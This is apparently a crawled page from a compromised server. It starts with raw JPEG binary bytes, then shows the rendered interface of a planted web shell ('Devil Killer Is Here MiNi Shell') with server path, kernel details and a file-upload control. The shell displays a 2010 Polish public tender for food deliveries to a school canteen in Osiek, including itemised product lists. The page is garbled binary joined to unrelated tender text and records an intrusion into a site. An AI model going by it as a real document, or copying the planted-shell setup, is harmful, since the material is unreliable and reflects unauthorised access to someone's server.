JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/211173-N-2010.html

<p class="kh_header"><b>Osiek: Dostawa artykułów żywnościowych
dla Zespołu Szkół im. Jana Pawła II w Osieku</b><br>
<b>Numer ogłoszenia: 211173 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Jana Pawła II w Osieku , ul. Wolności 24 a, 28-221 Osiek, woj. świętokrzyskie, tel. (015) 867 12 01, faks (015) 867 12 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zsosiek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół im. Jana Pawła II w Osieku.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych
dla Zespołu Szkół im. Jana Pawła II w Osieku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki Zespołu Szkół im. Jana Pawła II w Osieku. Dostawy podzielono na 8 zadań:
Zad. 1. Różne produkty spożywcze CPV - 15800000-6;
Zad. 2. Produkty mleczarskie CPV - 15500000-3
Zad. 3. Oleje i tłuszcze zwierzęce lub roślinne CPV - 15400000-2
Zad. 4. Drób CPV - 15112000-6
Zad. 5. Produkty zwierzęce. Mięso i produkty mięsne CPV - 15100000-9
Zad. 6. Produkty zwierzęce i podobne - jaja kurze CPV - 03140000-4
Zad. 7. Warzywa, owoce i orzechy CPV - 03220000-9
Zad. 8. Owoce i orzechy tropikalne CPV - 03222100-4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jak w zamówieniu publicznym.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.40.00.00-2, 15.11.20.00-6, 15.10.00.00-9, 03.14.00.00-4, 03.22.00.00-9, 03.22.21.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli Wykonawca przedłoży aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę). W przypadku występowania pełnomocnika należy dołączyć pełnomocnictwo dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu osoby-firmy składającej ofertę. Sprawdzenie w.w warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie w.w warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wymaganych w SIWZ wg. zasady spełnia  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy mogą dotyczyć w szczególności:
1)	nazwy, adresu oraz osób reprezentujących strony, 
2)	cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego w Monitorze Polskim. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1;
3)	urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy;
4)	każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
5)	terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 4, z zastrzeżeniem § 5 pkt 3.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zsosiek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego pokój nr 3 - sekretariat Zespołu Szkół im. Jana Pawła II w Osieku, ul. Wolności 24a, 28-221 Osiek, woj. świętokrzyskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 12:30, miejsce: W siedzibie Zamawiającego pokój nr 3 - sekretariat Zespołu Szkół im. Jana Pawła II w Osieku, ul. Wolności 24 a, 28-221 Osiek, woj. świętokrzyskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa I:
     Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Barszcz biały w butelce plastikowej 0,5l  		CPV 15890000-3 	397 szt.
2.	Barszcz czerwony koncentrat w butelce 0,5l	CPV 15890000-3	124 szt.
3.	Barszcz czerwony w proszku torebka 50 g instant 	CPV 15890000-3	285 szt.
4.	Buraczki ćwikła słoik 460 g 				CPV 15331120-4	234 szt.
5.	Chrupki kukurydziane flipsy smakowe 70g		CPV 15613300-1	21 szt.
6.	Chrzan tarty w słoiku 300 g 				CPV 15331110-1	7 szt.
7.	Cukier biały kryształ	op. 1 kg			CPV 15831200-4	650 kg
8.	Dżem truskawkowy 300 g 				CPV 15332296-5 	89 szt.
9.	Groszek konserwowy 400 g 				CPV 15331400-1 	90 szt.
10.	Grzybek suszony op. 100 g torebka 			CPV 03221260-6	75 szt.
11.	Kasza jęczmienna perłowa średnia op.1 kg		CPV 15613000-8 	137 kg
12.	Kasza manna w torebkach 0.5 kg			CPV 15613000-8 	6 szt.
13.	Kawa zbożowa ekspresowa op. 84 g 		CPV 15860000-4 	10 szt.
14.	Ketchup op. 500g					CPV 15871230-5	2 szt.
15.	Kisiel opakowanie 40 g 				CPV 15620000-0 	 214 szt.
16.	Koncentrat pomidorowy 200g 			CPV 15331427-6 	567 szt.
17.	Konserwa mięsna-kiełbasa 500g słoik		CPV 15131000-5	10 szt.
18.	Koper suszony op. 35 g 				CPV 15893000-4	156 szt.
19.	Kotlety sojowe op. 100g				CPV 15610000-7	9 szt.
20.	Makaron muszelki, świderki op. 400 g 		CPV 15851100-9	14 szt.
21.	Makaron nitki, świderki op. 2 kg 			CPV 15851100-9	24 szt.
22.	Makaron nitki, świderki op.1 kg 			CPV 15851100-9	934 szt.
23.	Makaron zacierka op. 250 g 				CPV 15851100-9	269 szt.
24.	Mąka pszenna typ 450 op. 1 kg			CPV 15612100-2	72 kg
25.	Mąka pszenna typ 500 op. 1 kg			CPV 15612100-2	385 kg
26.	Mąka ziemniaczana op. 500g				CPV 15600000-4	28 szt.
27.	Ogórki konserwowe 900 g 				CPV 15331400-1	358 szt.
28.	Paluszki beskidzkie torebka 300g			CPV 15612500-6	14 szt.
29.	Papryka konserwowa 900g				CPV 15331136-9	88 szt.
30.	Pasztet drobiowy firmowy op. 131g			CPV 15131310-1	10 szt.
31.	Pasztet drobiowy mazowiecki 500g			CPV 15131310-1	20 szt.
32.	Pietruszka suszona op. 8 g 				CPV 15893000-4	114 szt.
33.	Płatki kukurydziane kakaowe 250g			CPV 15613311-1	49 szt.
34.	Płatki owsiane górskie 500g				CPV 15613380-5	11 szt.
35.	Przyprawa do bigosu, gulaszu 20 g 			CPV 15893000-4 	120 szt.
36.	Przyprawa rosołek drob.-woł. 6 kostek op. 60g	CPV 15890000-3	83 szt.
37.	Przyprawa w płynie maga 200g			CPV 15870000-7	13 szt.
38.	Przyprawa wpłynie maga 1000g			CPV 15870000-7 	15 szt.
39.	Ryż długoziarnisty biały łuskany op.1kg		CPV 15614100-6	349 kg
40.	Sałatka obiadowa beskidzka 900g			CPV 15331000-7 	113 szt.
41.	Sok typu Kubuś lub równoważny125 ml		CPV 15320000-7	79 szt.
42.	Sok, syrop owocowy 450 ml 				CPV 15831500-7	78 szt.
43.	Sos Napoli do spagetti w proszku op. 40 g 		CPV 15871260-4	75 szt.
44.	Sos pieczarkowy w proszku op. 30 g 		CPV 15871260-4	25 szt.
45.	Sos ziołowo-koperkowy w proszku op. 9g		CPV 15871200-6 	40szt
46.	Szczaw konserwowy 300g				CPV 15332170-6 	49 szt.
47.	Przyprawa typu vegeta, kucharek op. 1000 g 	CPV 15890000-3 	16 szt.
48.	Przyprawa typu vegeta, kucharek op.200 g 		CPV 15890000-3	197 szt.
49.	Zupa w proszku borowikowa op. 68g		CPV 15891400-4	20 szt.
50.	Zupa w proszku grochowa op. 68g			CPV 15891400-4	20 szt.
51.	Zupa w proszku pieczarkowa op.  68g		CPV 15891400-4	15 szt.
Grupa II:
     Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
52.	Baton czekoladowy typu: Snikers, Adaś, Mars 	CPV 15842220-0	940 szt.
53.	Ciastka kruche luz z marmoladą			CPV 15820000-2	3,7 kg
54.	Ciastka kruche paczka typu petit op.350g		CPV 15820000-2	5 szt.
55.	Ciastka kruche zwierzaki w czekoladzie luz		CPV 15820000-2	0,5 kg
56.	Cukier waniliowy op. 32 g 				CPV 15830000-5	67 szt.
57.	Cynamon op. 20 g 					CPV 15872200-3	9 szt.
58.	Czekolada mleczna tabliczka 200 g 			CPV 15842100-3	755 szt.
59.	Czosnek granulowany op. 20g			CPV 15870000-7	8 szt.
60.	Drożdże spożywcze op.100 g 			CPV 15898000-9	28 szt.
61.	Herbata ekspresowa typu Saga op. 100 g 		CPV 15864100-3	65 szt.
62.	Herbata granulowana op. 100g			CPV 15863200-7	69 szt.
63.	Herbata owocowa ekspresowa op. 100 g 		CPV 15864100-3 	11 szt.
64.	Kakao op.100g					CPV 15841000-5	6 szt. 
65.	Kakao Puchatek op. 100g				CPV 15841000-5	6 szt.
66.	Majeranek op. 20 g 					CPV 15872300-4	55 szt.
67.	Miód sztuczny 400g					CPV 15831600-8 	1 szt.
68.	Pieprz czarny mielony op.20g			CPV 15872100-2	227 szt.
69.	Proszek do pieczenia op. 36 g 			CPV 15899000-6	24 szt.
70.	Przyprawa liść laurowy op. 15g			CPV 15870000-4	26 szt.
71.	Przyprawa ziele angielskie op. 15g			CPV 15870000-4	36 szt.
72.	Sól biała op. 1 kg 					CPV 15872400-5	190 kg
73.	Wafelek czekoladowy typu Princessa, Grześ- 39 g 	CPV 15842220-0	1425 szt.
74.	Wafelek orzechowy bez czekolady op.36g		CPV 15842300-5	67 szt.
75.	Woda gazowana w butelce plastikowej 1,5 litr 	CPV 15981200-0	6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Jogurt 150 g 	
termin przydatności do spożycia minimum 14 dni	CPV 15551300-8	7032 szt.
2.	Masło śmietankowe kostka 200 g 			CPV 15530000-2	200 szt.
3.	Mleko 2% op.1 litr kubek, butelka  lub woreczek	CPV 15511000-3	111 szt.
4.	Mleko 3,2%  op.1 litr kubek, butelka lub woreczek	CPV 15511000-3	463 szt
5.	Ser biały- twaróg półtłusty - kostki 200 g, 
minimalna trwałość 14 dni 				CPV 15542100-0	765 szt.
6.	Ser żółty blok						CPV 15544000-3	7,4 kg
7.	Ser żółty plastry op. 150g				CPV 15544000-3	3 szt.
8.	Serek homogenizowany op. 150g	
termin przydatności do spożycia min.14 dni		CPV 15540000-5	76 szt.
9.	Serek topiony 100g	
termin przydatności do spożycia min. 2 miesiące	CPV 15540000-5	6 szt.
10.	Serek twarożek śmietankowy w kubku 150g 
termin przydatności do spożycia min. 2 miesiące	CPV 15542100-0	16 szt.
11.	Serki typu:Danonki lub równoważny, czteropak mega 320g, 
termin przydatności do spożycia minimum 14 dni	CPV 15540000	10 szt.
12.	Śmietana 18 % świeża, op. 400 g
trwałość minimum 10 dni, kubek lub woreczek 	CPV 15512000-0	331 szt.
13.	Śmietana kremowa 30% świeża op.500ml woreczek
trwałość minimum 10 dni,				CPV 15512000-0	508 szt.
14.	Śmietana wiejska 18% świeża op. 200 g, kubek 
trwałość minimum 10 dni,		CPV 15512000-0	298 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oleje i tłuszcze zwierzęce lub roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Margaryna tyu Śniadaniowa, Miss, Kromeczki lub równoważna op.500 g 
do smarowania pieczywa, termin przydatności 
do spożycia minimum 2 miesiące			CPV 15431100-9	421 szt.
2.	Olej roślinny jadalny (do smażenia i surówek) op. 1 litr butelki, termin 
przydatności do spożycia minimum 3 miesiące	CPV 15411100-3	42 szt.
3.	Olej roślinny jadalny (do smażenia i surówek) op.3 litry butelki, termin
 przydatności do spożycia minimum 3 miesiące	CPV 15411100-3	44 szt.
4.	Olej roślinny jadalny (do smażenia i surówek) op. 5 litr butelki, termin 
przydatności do spożycia minimum 3 miesiące	CPV 15411100-3	78 szt.
5.	Smalec 200g, kostka, termin przydatności 
do spożycia minimum 2 miesiące			CPV 15131130-5	597 szt.
6.	Smalec termin przydatności do spożycia
 minimum 2 miesiące 				CPV 15131130-5	13 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Ćwiartka tylna z kurczaka świeża, 
zapach charakterystyczny dla mięsa świeżego 	CPV 15131500-0	605 kg
2.	Filet drobiowy świeży
zapach charakterystyczny dla mięsa świeżego	CPV 15131500-0	50 kg
3.	Kurczak świeży, 
zapach charakterystyczny dla mięsa świeżego	CPV 15131500-0	232 kg
4.	Porcja rosołowa świeża, 
zapach charakterystyczny dla mięsa świeżego	CPV 15131500-0	1 kg
5.	Skrzydełka świeże, 
zapach charakterystyczny dla mięsa świeżego	CPV 15131500-0	71 kg
6.	Wątroba drobiowa świeże, 
zapach charakterystyczny dla mięsa świeżego	CPV 15112300-9	138 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> . Produkty zwierzęce. Mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu					Kod CPV	Ilość szacunkowa
1.	Baleron gotowany					CPV 15131130-5	2,6 kg
2.	Boczek wędzony 					CPV 15131200-7	76 kg
3.	Karczek wieprzowy, świeży, 
zapach charakterystyczny dla mięsa świeżego 	CPV 15113000-3	36 kg
4.	Kiełbasa typu Zwyczajna lub równoważna. 		CPV 15131130-5	172 kg
5.	Kiełbasa typu Krakowska - swojska grubomielona	CPV 15131130-5	1,3 kg
6.	Kiełbasa typu Krakowska lub równoważna		CPV 15131130-5	7,2 kg
7.	Kiełbasa szynkowa drobnomielona			CPV15131130-5	17 kg
8.	Kiełbasa wiejska 					CPV 15131130-5	185 kg
9.	Kiełbasa Żywiecka lub równoważna			CPV 15131130-5	4,7 kg
10.	Kości wieprzowe od schabu,	świeże, 
zapach charakterystyczny dla mięsa świeżego	CPV 15100000-9	174 kg
11.	Kiełbasa typu Lencz Królewski, tyrolska lub równoważna
							CPV 15131130-5	7,4 kg
12.	Łopatka wieprzowa bez kości, świeża, mięso gulaszowe,
zapach charakterystyczny dla mięsa świeżego	CPV 15113000-3	472 kg
13.	Mielonka - mięso sznyclowe 0,5 kg, świeża, 
zapach charakterystyczny dla mięsa świeżego	CPV 15130000-8	570 szt.
14.	Mięso wołowe żebro świeże, 
zapach charakterystyczny dla mięsa świeżego	CPV 15111000-9	19 kg
15.	Mortadela lub równoważna				CPV 15131130-5	6 kg
16.	Pasztet pieczony wieprzowo-drobiowy		CPV 15114000-0	5,3 kg
17.	Pieczeń drobnomielona wieprzowo- wołowa	CPV 15131130-5	3 kg
18.	Polędwica Sopocka lub równoważna		CPV 15131130-5	21,4 kg
